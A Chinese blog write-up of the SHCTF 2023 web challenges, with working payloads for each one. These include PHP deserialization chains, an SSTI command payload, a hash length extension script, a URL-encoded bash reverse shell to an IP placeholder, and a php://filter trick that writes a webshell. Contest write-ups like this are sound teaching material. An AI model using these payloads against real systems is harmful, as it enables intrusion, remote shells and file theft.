SHCTF 2023 新生赛 Web 题解

已于 2023-11-03 11:35:10 修改
阅读量1.2k 收藏 10
点赞数 3
分类专栏: writeup CTF 文章标签: web安全 CTF
于 2023-10-30 12:48:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63138919/article/details/134116648
版权
CTF 同时被 2 个专栏收录
24 篇文章 0 订阅
订阅专栏
writeup
12 篇文章 0 订阅
订阅专栏

Web

[WEEK1]babyRCE

源码过滤了cat 空格 我们使用${IFS}替换空格 和转义获得flag

[WEEK1]飞机大战

源码js发现unicode编码

\u005a\u006d\u0078\u0068\u005a\u0033\u0074\u006a\u0059\u006a\u0045\u007a\u004d\u007a\u0067\u0030\u005a\u0069\u0030\u0031\u0059\u006d\u0045\u0032\u004c\u0054\u0052\u0068\u004e\u007a\u0055\u0074\u004f\u0057\u0049\u0031\u004e\u0053\u0030\u007a\u004d\u007a\u0063\u0031\u0059\u0032\u0051\u0078\u005a\u0047\u0049\u0079\u004f\u0057\u004a\u0039\u000a

解码获得flag

[WEEK1]登录就给flag

这道题直接爆破password就行 爆破到密码为password发现302跳转 抓包获得flag

[WEEK1]生成你的邀请函吧~

使用POST json请求来生成你的邀请函

直接用脚本就行了

import requests

from PIL import Image

import io



url = "http://112.6.51.212:30908/generate_invitation"



data = {

   "name": "C_yi",

   "imgurl": "http://q.qlogo.cn/headimg_dl?dst_uin=3590468098&spec=640&img_type=jpg"

}



response = requests.post(url, json=data, verify=False)



# 获取返回的图片内容

image_content = response.content



# 创建一个PIL的Image对象

image = Image.open(io.BytesIO(image_content))



# 保存图片

image.save("avatar.jpg")

然后搜索avatar.jpg

得到flag

[WEEK1]ez_serialize

<?php

highlight_file(__FILE__);



class A{

  public $var_1;

  

  public function __invoke(){

   include($this->var_1);

  }

}



class B{

  public $q;

  public function __wakeup()

{

  if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->q)) {

            echo "hacker";           

        }

}



}

class C{

  public $var;

  public $z;

    public function __toString(){

        return $this->z->var;

    }

}



class D{

  public $p;

    public function __get($key){

        $function = $this->p;

        return $function();

    }  

}



if(isset($_GET['payload']))

{

    unserialize($_GET['payload']);

}

?>

代码审计

我们反推把 首先看输出点为include()函数

那么执行这个函数 我们就要调用__invoke()魔术方法 这个魔术方法的调用就要通过下面的p参数令 p = new A()(调用条件网上都有)

要想调用p 那就要触发__get()魔术方法 调用这个方法就要看这个z参数 因为z下边无var

想要调用z就要触发__tostring()魔术方法,那就这里是个考点 按道理我们只需要令$var = new C();就可以触发 但看下面这个

Preg_match()函数这个判定就可以直接触发__tostring()魔术方法 那我们直接$p = new B()就可以 那触发__wakeup()函数很简单 反序列就触发

所以构造最终的代码

<?php

class A{

  public $var_1 = 'php://filter/read=convert.base64-encode/resource=flag.php';



}



class B{

  public $q;





}

class C{

  public $var;

  public $z;



}



class D{

  public $p;



}

$b = new B();

$c = new C();

$b->q = $c;

$d = new D();

$c->z = $d;

$d->p = new A();

var_dump(serialize($b))

?>

Payload:O:1:"B":1:{s:1:"q";O:1:"C":2:{s:3:"var";N;s:1:"z";O:1:"D":1:{s:1:"p";O:1:"A":1:{s:5:"var_1";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}}}

然后base64解码就得到falg了

[WEEK1]1zzphp

这道题关键就是利用正则最大回溯绕过,一般下面看到这种就要想到了

所以也没啥难的 按照下面这个自己调试就饿可以了

我的是

import requests

url="http://112.6.51.212:32191/?num[]=1"

data={

'c[ode':'very'*250000+'2023SHCTF'

}

r=requests.post(url,data=data)

print(r.text)

[WEEK1]ezphp

这道题的考点就是研究preg_replace \e模式下的代码执行

可以看这篇文章

深入研究preg_replace \e模式下的代码执行_preg_replace /e-CSDN博客

深入研究preg_replace \e模式下的代码执行_preg_replace()执行问题-CSDN博客

因为这道题的phpinfo()和大括号没被过滤

所以可以利用

题目就是通过get传参code post传参pattern 关键就是下面这句话

preg_replace 使用了 /e 模式,导致了代码可以被执行

那我们直接利用就好了我们通过POST传参 (.*) 的方式传入pattern  code传入

原先的语句: preg_replace('/(' . $pattern . ')/ei', 'print_r("\\1"))', $coder);

变成了语句: preg_replace('/(.*)/ei', 'print_r("\\1")', {${phpinfo()}});

所以得到flag了

[WEEK2]no_wake_up

又是一道简单的反序列化题

Exp:

<?php



class flag{

    public $username = "admin";

    public $code = "php://filter/read=convert.base64-encode/resource=flag.php";





}

$a = new flag();

echo serialize($a);

Paylaod:?try=O:4:"flag":2:{s:8:"username";s:5:"admin";s:4:"code";s:57:" ";}

解码获得flag

[WEEK2]EasyCMS

考点:【CVE-2021-46203】Taocms v3.0.2 任意文件读取

需要登录后台,默认的账号密码为 admin/tao 然后目录穿越获得flag

[WEEK2]ez_ssti

有点像ctfshow 里面的web361

?name={{ config.__class__.__init__.__globals__['os'].popen('ls /').read() }}

发现flag

?name={{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}

[WEEK2]MD5的事就拜托了 

源代码

<?php
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['SHCTF'])){
    extract(parse_url($_POST['SHCTF']));
    if($$$scheme==='SHCTF'){
        echo(md5($flag));
        echo("</br>");
    }
    if(isset($_GET['length'])){
        $num=$_GET['length'];
        if($num*100!=intval($num*100)){
            echo(strlen($flag));
            echo("</br>");
        }
    }
}
if($_POST['SHCTF']!=md5($flag)){
    if($_POST['SHCTF']===md5($flag.urldecode($num))){
        echo("flag is".$flag);
    }
}

逐级分析代码;

if(isset($_POST['SHCTF'])){
    extract(parse_url($_POST['SHCTF']));  
    if($$$scheme==='SHCTF'){
        echo(md5($flag));
        echo("</br>");
    }

这里的考点看下面一边文章就行 

 parse_url函数的解释和绕过-CSDN博客

我这里的构造为  可以得到md5加密的falg

SHCTF=host://SHCTF:pass@user/SHCTF 

分析下一段代码

if(isset($_GET['length'])){
        $num=$_GET['length'];
        if($num*100!=intval($num*100)){
            echo(strlen($flag));
            echo("</br>");
        }

考察intval()函数的绕过  网上搜下就懂了 然后可以得到flag的长度

?length=1.001

得到 md5加密的flag 和长度

 

再看下一段

if($_POST['SHCTF']!=md5($flag)){
    if($_POST['SHCTF']===md5($flag.urldecode($num))){
        echo("flag is".$flag);
    }
}

传入SHCTF不能等于md5加密的flag ,然后看向最后的if语句,直接网上搜md5($flag.urldecode($num)),可以搜到其考点为哈希拓展攻击。具体访问下面文章(挂个梯子)

hash-ext-attack攻击脚本

import base64
import hashlib
import hmac
import struct
import sys
import time
import urllib.parse

from common.md5_manual import md5_manual
from loguru import logger
from common.crypto_utils import CryptoUtils


class HashExtAttack:
    """
    哈希长度扩展攻击,解决 hashpump 在win下使用困难的问题
    目前仅支持md5,如果你对认证算法有了解可以手动改写str_add中的字符串拼接方式
    """

    def __init__(self):
        self.know_text = b""
        self.know_text_padding = b""
        self.new_text = b""
        self.rand_str = b''
        self.know_hash = b"3c5a36dd888251601d36bbc184648717"
        self.key_length = 15

    def _padding_msg(self):
        """填充明文"""
        logger.debug("填充明文")
        self.know_text_padding = md5_manual.padding_str(self.know_text)
        logger.debug(f"已知明文填充:{self.know_text_padding}")

    def _gen_new_plain_text(self):
        """生成新明文"""
        self.new_text = self.know_text_padding + self.rand_str  # b'80' + 55 * b'\x00' + struct.pack("<Q", 512 + len(self.rand_str) *8)
        logger.debug(f"new_text: {self.new_text}")

    def split_hash(self, hash_str: bytes):
        by_new = CryptoUtils.trans_str_origin2_bytes(hash_str.decode())
        return struct.unpack("<IIII", by_new)

    def _guess_new_hash(self) -> tuple:
        """生成新hash"""
        # 第一步先生成新的字符串
        # 对已知明文进行填充
        self._padding_msg()
        # 第二步 生成新明文
        self._gen_new_plain_text()
        # 第三步 生成新hash(基于已知hash进行计算)
        # 3.1 hash拆分成4个分组
        hash_block = self.split_hash(hash_str=self.know_hash)
        md5_manual.A, md5_manual.B, md5_manual.C, md5_manual.D = hash_block
        tmp_str = md5_manual.padding_str(self.new_text)
        logger.debug(f"新明文填充tmp_str({len(tmp_str)}): {tmp_str}")
        logger.debug(f"参与手工分块计算的byte:{tmp_str[-64:]}")
        md5_manual.solve(tmp_str[-64:])
        self.new_hash = md5_manual.hex_digest()

        return self.new_text, self.new_hash

    def run(self, know_text, know_hash, rand_str, key_len) -> tuple:
        # self.know_text = input("请输入已知明文:")
        self.know_text = ("*" * key_len + know_text).encode()  # 密钥拼接
        self.know_hash = know_hash.encode()
        self.rand_str = rand_str.encode()

        self._guess_new_hash()
        logger.info(f"已知明文:{self.know_text[key_len:]}")
        logger.info(f"已知hash:{self.know_hash}")
        logger.debug(f"任意填充:{self.rand_str}")
        logger.info(f"新明文:{self.new_text[key_len:]}")
        logger.info(f"新明文(url编码):{urllib.parse.quote(self.new_text[key_len:], safe='&=')}")
        # logger.debug(f"新明文:{base64.b64encode(self.new_text[key_len:])}")
        logger.info(f"新hash:{self.new_hash}")
        return self.new_text[key_len:], self.new_hash

    def input_run(self):
        time.sleep(0.2)
        self.run(input("请输入已知明文:"), input("请输入已知hash: "), input("请输入扩展字符: "),
                 int(input("请输入密钥长度:")))

    def test(self):
        self.run(
            "order_id=70&buyer_id=17&good_id=38&buyer_point=300&good_price=888&order_create_time=1678236217.799935",
            "178944d4a39e4e4af6522c6de6cb24c5", "&good_price=1", 50)


hash_ext_attack = HashExtAttack()

if __name__ == '__main__':

    logger.remove()
    logger.add(sys.stderr, level="INFO")
    hash_ext_attack.input_run()

 得到payload:

?length=%80%00%00%00%00%00%00%00%00%00%00%00%00%00P%01%00%00%00%00%00%00ab
SHCTF=c4053dcc95bf563af279f7e4bb1f9e17

 

 得到flag

[WEEK2]ez_rce

用Kicky师傅的解法去复现吧

附件源码:

from flask import *
import subprocess

app = Flask(__name__)

def gett(obj,arg):
    tmp = obj
    for i in arg:
        tmp = getattr(tmp,i)
    return tmp

def sett(obj,arg,num):
    tmp = obj
    for i in range(len(arg)-1):
        tmp = getattr(tmp,arg[i])
    setattr(tmp,arg[i+1],num)

def hint(giveme,num,bol):
    c = gett(subprocess,giveme)
    tmp = list(c)
    tmp[num] = bol
    tmp = tuple(tmp)
    sett(subprocess,giveme,tmp)

def cmd(arg):
    subprocess.call(arg)


@app.route('/',methods=['GET','POST'])
def exec():
    try:
        if request.args.get('exec')=='ok':
            shell = request.args.get('shell')
            cmd(shell)
        else:
            exp = list(request.get_json()['exp'])
            num = int(request.args.get('num'))
            bol = bool(request.args.get('bol'))
            hint(exp,num,bol)
        return 'ok'
    except:
        return 'error'
    
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=5000)

考点需要本地调试 Subprocess Call

第一步进行构造进行污染

?num=7&bol=True

post:

{

"exp": ["Popen", "__init__", "__defaults__"]

}

修改 Content-Type: application/json

返回 ok 代表成功

第二步构造

/?

exec=ok&shell=%62%61%73%68%20%2D%63%20%22%62%61%73%68%20%2D%69%20%3E%26%20%2

F%64%65%76%2F%0D%0A%74%63%70%2F%49%50%2F%32%32%32%32%20%30%3E%26%31%22
反弹 shell 获得 flag
官方wp:

Subprocess.call函数有一个参数shell,当shell为True时,执行命令时是/bin/sh -c “$cmd”这样的,可以进行命令注入。而当shell为false时,执行命令时是/bin/cmd arg这种。而这个方法的shell参数默认为false。

进入subprocess函数查看call函数

图片

可以看到实际上是调用的Popen类的函数,进入Popen看看

图片

可以看到构造参数中shell默认为false

函数的默认参数保存在defaults属性中

图片

通过查看得知shell参数的值在第7个,所以只需要修改7下标为True就可以执行任意命令了。

通过阅读代码,可以知道gett函数是通过遍历json获取subprocess的属性,sett函数是遍历并将取到的属性设置为修改后的值。

先修改shell参数,注意修改content-type

图片

下来命令执行

图片

图片

读flag即可

图片

图片

[WEEK2]serialize

这道题卡了很久 最后也是做出来了 我觉得最大的考点就是数组绕过if(preg_match('/^O:\d+/',$data)){ 而不是采用+ 这点我卡了特别久

js代码:

var arr = ["o123:", "c456:", "d789:"];

arr = arr.filter(function(element) {

  return !/[oc]:\d+:/i.test(element); // 返回不匹配正则表达式的元素

});

console.log(arr); // 输出: ["d789:"]

Pop链比较简单:wakeup()->get()->totring()

构造代码

<?php



class misca{

    public $gao;

    public $fei;

    public $a;





}

class musca{

    public $ding;

    public $dong;



}

class milaoshu{

    public $v = "php://filter/read=convert.base64-encode/resource=flag.php"; //为协议读取



}



$m = new musca();

$m->ding = new misca(); //这个就是触发get魔术方法

$m->ding->gao = &$m->ding->a; //把gao赋值给a

$m->ding->fei = new milaoshu(); //触发tostring魔术方法

echo serialize(array($m)); //利用数组进行绕过正则匹配

Payload:a:1:{i:0;O:5:"musca":2:{s:4:"ding";O:5:"misca":3:{s:3:"gao";N;s:3:"fei";O:8:"milaoshu":1:{s:1:"v";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}s:1:"a";R:4;}s:4:"dong";N;}}

解码获得flag

[WEEK3]快问快答

这种短时间内回答的题一看就是要脚本

根据源码写paylaod就行

import requests
import re
import time
def post_answer(url, headers, answer, cookie):#发送请求
   answer1 = {'answer': answer}
   response=requests.Session()
   response = response.post(url, headers=headers, data=answer1,cookies=cookie)#这个需要设cookie,因为每道题的cookie都是不同的
   return response

def parse_question(response):#用于计算答案
   html = response.text
   answer=0
   pattern = re.compile(r"<h3>(.*?)</h3>")#提取题目信息
   match = pattern.search(html)
   if match:
       question = match.group(1)
       numbers = re.findall(r"\d+", question)
       operation = re.findall(r'异或|与|\+|-|x|÷', question)#识别运算符
       op=operation[0]
       if len(numbers) == 2:
           a = int(numbers[0])
           b = int(numbers[1])
           if op == "异或":
               answer = a ^ b
           if op == "与":
               answer = a & b
           if op == "-":
               answer = a - b
           if op == "+":
               answer = a + b
           if op == "x":
               answer = a * b
           if op == "÷":
               answer = int(a/b)#这里要特别注意要强转成整形,因为题目只能提交整数,如果不转,脚本运行的时候,会因为提交无效数据而爆500的错误
           #print(question)
           #print(answer)
   else:
           print("找不到题目")
   return answer

url = "http://112.6.51.212:32776/"  # 这里替换为你要访问的网址
headers = {"Content-Type": "application/x-www-form-urlencoded"}
cookie=0
answer = 0
for i in range(1,52):#这里要设置成52,相当于循环了51次,因为第一次是初始化,答案是错的
       time.sleep(1)#这里是为了别让程序答得太快,因为题目答题速度是1到2秒之间
       response = post_answer(url, headers, answer, cookie)
       print(response.text)#打印表单
       answer = parse_question(response)
       cookie = response.cookies

得到flag

[WEEK3]sseerriiaalliizzee

源码:

<?php
error_reporting(0);
highlight_file(__FILE__);

class Start{
    public $barking;
    public function __construct(){
        $this->barking = new Flag;
    }
    public function __toString(){
            return $this->barking->dosomething();
    }
}

class CTF{ 
    public $part1;
    public $part2;
    public function __construct($part1='',$part2='') {
        $this -> part1 = $part1;
        $this -> part2 = $part2;
        
    }
    public function dosomething(){
        $useless   = '<?php die("+Genshin Impact Start!+");?>';
        $useful= $useless. $this->part2;
        file_put_contents($this-> part1,$useful);
    }
}
class Flag{
    public function dosomething(){
        include('./flag,php');
        return "barking for fun!";
        
    }
}

    $code=$_POST['code']; 
    if(isset($code)){
       echo unserialize($code);
    }
    else{
        echo "no way, fuck off";
    }
?> 
no way, fuck off

出口函数 file_put_contents很简单的pop链 Start:__tostring()->CTF:dosomething()

考点就是无非是file_put_contents()

大概意思就是 你能够执行$this-> part1这个命令 但是因为下面这个

里面的die()函数导致你的uesful无法运行 即、$this->part2=执行的命令无法成功

那这里的考点就是file_put_contents利用技巧

具体访问:(*´∇`*) 欢迎回来! (cnblogs.com)

我们直接构造paylaod:

<?php eval('system("ls /");');  ?> 然后base64编码(?前面不加空格 就会编码变成+号)

PD9waHAgZXZhbCgnc3lzdGVtKCJscyAvIik7Jyk7ICA/Pg==

然后

构造脚本

<?php
class Start{
    public $barking;
}

class CTF{
    public $part1;
    public $part2;
}
$start=new Start();
$start->barking=new CTF();
$start->barking->part1="php://filter/write=convert.base64-decode/resource=wenda.php";
$start->barking->part2="PD9waHAgZXZhbCgnc3lzdGVtKCJscyAvIik7Jyk7ICA/Pg==";
//因为$useless能被base64解码的只有phpdie+GenshinImpactStart+一共26个字符,所以需要加2个a凑成28个,4的倍数
//然后写需要执行的命令,进行base64编码,接着访问wenda.php就能得到flag

echo serialize($start);
?>

同理换成 cat /flag

Paylaod:

O:5:"Start":1:{s:7:"barking";O:3:"CTF":2:{s:5:"part1";s:59:"php://filter/write=convert.base64-decode/resource=wenda.php";s:5:"part2";s:54:"aaPD9waHAgZXZhbCgnc3lzdGVtKCJjYXQgL2ZsYWciKTsnKTsgPz4=";}}

[WEEK3]gogogo

考点:go代码审计,session伪造,通配符绕过

这里先贴一个windows下运行go 安装使用

https://blog.csdn.net/qq_42313447/article/details/114403953

 下载源码得到三个路由

main.go

package main

import (
	"main/route"

	"github.com/gin-gonic/gin"
)

func main() {
	r := gin.Default()
	r.GET("/", route.Index)
	r.GET("/readflag", route.Readflag)
	r.Run("0.0.0.0:8000")
}

 分析一下,就是给了两个路由。

route.go

package route

import (
	"github.com/gin-gonic/gin"
	"github.com/gorilla/sessions"
	"main/readfile"
	"net/http"
	"os"
	"regexp"
)

var store = sessions.NewCookieStore([]byte(os.Getenv("SESSION_KEY")))

func Index(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == nil {
		session.Values["name"] = "User"
		err = session.Save(c.Request, c.Writer)
		if err != nil {
			http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
			return
		}
	}

	c.String(200, "Hello, User. How to become admin?")

}

func Readflag(c *gin.Context) {
	session, err := store.Get(c.Request, "session-name")
	if err != nil {
		http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
		return
	}
	if session.Values["name"] == "admin" {
		c.String(200, "Congratulation! You are admin,But how to get flag?\n")

		path := c.Query("filename")

		reg := regexp.MustCompile(`[b-zA-Z_@#%^&*:{|}+<>";\[\]]`)

		if reg.MatchString(path) {

			http.Error(c.Writer, "nonono", http.StatusInternalServerError)
			return
		}

		var data []byte
		if path != "" {
			data = readfile.ReadFile(path)
		} else {
			data = []byte("请传入参数")
		}

		c.JSON(200, gin.H{
			"success": "read: " + string(data),
		})
	} else {
		c.String(200, "Hello, User. How to become admin?")
	}

}

 我们分析一下下面这个index里面这个

 如果name为nil  接着就改为user

我们再看看readflag里面这个 就发现name要为admin 才能接下来的步骤

这里的意思很好懂,就是要把name的值改为admin。但是抓包后发现是有加密的

那我们可不可以伪造session? 让他成为admin呢 我们知道session的加密方式为

var store = sessions.NewCookieStore([]byte(os.Getenv("SESSION_KEY")))

我们猜测环境没有设置session-key,本地搭环境得到session值去伪造 

 意思就是我们只要把route.go里面的 index改为admin就行

session.Values["name"] = "admin"

 然后go run .main.go

然后访问127.0.0.1:8000,对应的cookie即为admin

 最后就是readfile.go

package readfile

import (
	"os/exec"
)

func ReadFile(path string) (string2 []byte) {
	defer func() {
		panic_err := recover()
		if panic_err != nil {

		}
	}()
	cmd := exec.Command("bash", "-c", "strings  "+path)
	string2, err := cmd.Output()
	if err != nil {
		string2 = []byte("文件不存在")
	}
	return string2
}

 简单的读取文件,构造出读取文件的语句 ,我们还记得给了两个路由 我们访问readflag

然后看看过滤条件 

reg := regexp.MustCompile(`[b-zA-Z_@#%^&*:{|}+<>";\[\]]`)

不难发现有个a还可以用并且问号没被过滤,这里采取通配符绕过 得到flag

?filename=/??a?

 

#filename=/bin/base /flag
filename=/???/?a??64%09/??a?


 

W3nd4L0v3
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
Web安全攻防靶场之WebGoat - 1
DarkN0te
02-24 2660
文章目录概述部署使用release版本部署使用IntroductionWebGoatWebWolfGeneralHTTP BasicsStage 2Stage 3HTTP ProxiesInjection FlawsSQL InjectionStage7Stage8SQL Injection(advanced)Stage3Stage5SQL Injection(mitigation)Stage8 ...
CTF Web资料.zip
09-27
CTF Web资料.zip
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
CTF100.docx
05-25
CTF是一种流行的信息安全形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗”。其大致流程是,参团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。 CTF模式具体分为以下三类: 一、解模式(Jeopardy) 在解模式CTF制中,参队伍可以通过互联网或者现场网络参与,这种模式的CTF与ACM编程竞、信息学奥比较类似,以解决网络安全技术挑战目的分值和时间来排名,通常用于在线选拔目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。 二、攻防模式(Attack-Defense) 在攻防模式CTF制中,参队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。攻防模式CTF制可以实时通过得分反映出比赛情况,最终也以得分直接分出胜负,是一种竞争激烈,具有很强观赏性和高度透明性的网络安全制。在这种制中,不仅仅是比参队员的智力
CTF Web各种目的解姿势
07-27
第1章 注入类 课时1:SQL注入原理与利用 19'40 课时2:SQL注入宽字节原理与利用42'08 课时3:SQL Union注入原理与利用01'01'54 课时4:SQL注入布尔注入50'02 课时5:报错注入原理与利用29'27 课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入实验 - POST注入13'34 课时11:SQL注入常用基础Trick18'15 第2章 代码执行与命令执行 课时1:代码执行介绍49'32 课时2:命令执行介绍20'14 课时3:命令执行分类20'12 课时4:命令执行技巧24'30 课时5:长度限制的命令执行25'46 课时6:无数字和字母命令执行10'27 第3章 文件上传与文件包含 课时1:文件上传漏洞原理与简单实验17'10 课时2:文件上传利用 - javascript客户端检查14'16 课时3:文件上传利用 - MIME类型检查10'50 课时4:文件上传利用 - 黑名单检查11'46 课时5:白名单检查13'09 课时6:Magic Header检查13'04 课时7:竞争上传21'10 课时8:简单利用15'47 课时9:文件包含介绍 - 伪协议zip和phar利用17'56 课时10:文件包含介绍-伪协议phpfilter利用04'54 课时11:日志文件利用07'58 课时12:日志文件利用session会话利用17'43 第4章 SSRF 课时1:SSRF介绍与简单利用19'14 课时2:SSRF限制绕过策略13'07 课时3:SSRF中可以使用的协议分析17'44 课时4:Linux基础知识21'37 课时5:Redis未授权访问漏洞利用与防御16'17 课时6:Redis未授权添加ssh密钥f17'04 第5章 第五章 课时1:XXE-XML基础必备24'47 课时2:XXEXML盲注利用技巧18'22 第6章 第六章 课时1:序列化和反序列化介绍15'49 课时2:PHP反序列化识别与利用14'22 课时3:PHP序列化特殊点介绍15'28 课时4:魔术方法20'35 课时5:序列化漏洞案例 - 任意命令执行05'53 课时6:Phar反序列化10'38 第7章 第7章 Python基础 课时1:7.1-Requests模块安装与介绍15'28 课时2:7.2-Python requests库 使用18'26 课时3:7.3-XSS自动化检测13'23 课时4:7.4-Python-SQL自动化检测07'59 课时5:7.5-Python 源码泄露自动化挖掘23'38 第8章 第8章 SSTI模板注入 课时1:8.1-Flask框架介绍与基础39'14 课时2:8.2-RCE 文件读写23'37 课时3:8.3-SSTI Trick技巧27'13
SHCTF 2023 [WEEK 1] PWN
Xzzzz911的博客
10-31 453
SHCTF-"山河"网络安全技能挑战 是由齐鲁工业大学、西安邮电大学、广东海洋大学、长春工程学院、郑州轻工业大学、河南大学、齐鲁师范学院、陕西邮电职业技术学院、陕西工业职业技术学院、商丘师范学院、咸阳师范学院 (排名不分先后)等十所高校共同举办的 CTF比赛, 完结撒花!!!这次比赛收获很大,新生往往会让你收获意想不到的知识点,挺好的,人民的好比赛,支持支持,明年再来 -_- ,接下来会把比赛分周分享记录下来。
青少年CTF-Web-帝国CMS1-3通关记录
zxsctf的博客
12-08 1556
本次进通过平台内目进行,非真实环境。 首先下发目链接我们首先先找后台看看后台地址为随后,经过dirsearch进行扫描,得到了一个www.zip 访问扫描到的www.zip,得到网站源码使用D盾扫描,得到eval后门。蚁剑链接得到根目录的Flag这道目和CMS01差不多,但是好像又有天差地别管理员发现你入侵了他的服务器,管理员修改了密码并删除了后门那么我们优先尝试管理员是不是给了一个弱口令经过弱口令爆破登陆成功密码为123456789这道目考察了一个帝国CMS的漏洞利用,我们先看看帝国CMS03有什
SHCTF-校外
m0_73728268的博客
11-08 473
(本地资料已经保存)https://www.cnblogs.com/zzjdbk/p/13491028.html。
SHCTF2023 山河CTF Reverse方向week2全WP【详解】
Sciurdae的博客
10-29 728
这里为什么呢,因为这里关于迷宫的数据放在数组里,是以一维数组的形式出现的,如果将一维数组分为 8 * 8的 二维数组 那 -8和+8不就是向上或向下移动 , 如果再将 8 * 8扩展到 8 * 8 * 8 的地步, 那么加 64也就是到下一个 迷宫去了。的时候用的这道的附件,交了好久的flag一直是错误的,当时真的一点自己做过这的记忆都没有 奇怪。sudu函数里面的内容,是一个 9 * 9 的数独表,大致意思是如果map索引位置为真,我们的输入就是0,如果为假的话,就将我们的数字填入。
ICPC2023 西安区域 题解.pdf
11-09
ICPC2023 西安区域 题解.pdf
新生题解
12-10
2018年秋季18届新生模拟题解,内含全部八个大,附解思路。
2020CCPC网络题解.pdf
07-12
2020CCPC网络题解
中国高校计算机大-团体程序设计天梯-题解.zip
04-21
中国高校计算机大-团体程序设计天梯_题解.zip
2023.9.9题解fdafafasffas
09-09
2023.9.9题解fdafafasffas
网络安全之弱口令与命令爆破(中篇)(技术进阶)
weixin_70911257的博客
04-28 709
弱口令就是容易被人们所能猜到的密码呗,例如:admin,123456,888等等简单的密码。这种针对验证码的爆破只是最简单的一种,还有其他的验证码类型,能爆破,但是有点难,等以后再出一篇看看吧,下篇的内容是token防爆破,防爆破口令绕过,word,加密的zip压缩文件,windows登录密码,mysql数据库登录密码,ssh登录密码的弱口令爆破。下个星期有空再写吧,这篇内容不全还有一个知识点没讲到(出了点问题解决了再加上来吧)。!
大模型引领未来:探索其在多个领域的深度应用与无限可能【第七章、大模型在科技、网络安全、农业等方面的应用探索】
今晚打老虎的专栏
05-01 812
大型模型在科技、网络安全和农业领域的应用持续演进。在科技中,它们加速了天文学和科学研究的进展。在网络安全领域,大模型提高了网络威胁检测和应对的效率。而在农业中,它们帮助农民做出精准决策,优化产量和质量。这些应用展示了大模型在不同领域的广泛用途,为各行业带来新的发展机遇。
【网络安全产品】---应用防火墙(WAF)
最新发布
嘿嘿嘿
05-04 501
Web应用防火墙(Web Application FirewallWAF可对网站或者App的业务流量进行恶意特征识别及防护,在对流量清洗和过滤后,将正常、安全的流量返回给服务器,避免网站服务器被恶意入侵导致性能异常等问,从而保障网站的业务安全和数据安全
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 1825
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
2023西安ICPC邀请题解
09-15
引用: 这个问是关于Bob在一个包含1到n的全排列中与Alice进行游戏的目。Bob需要在操作中避免出现两次相同的第一个数p1。为了使Bob获胜,他需要在第二个数到第p1个数之间的排列数量为(n-p1)的阶乘。 引用: 对于这个特定目,如果n=2023,Bob能获胜的次数是(n-1)的阶乘,即2022的阶乘。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W3nd4L0v3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值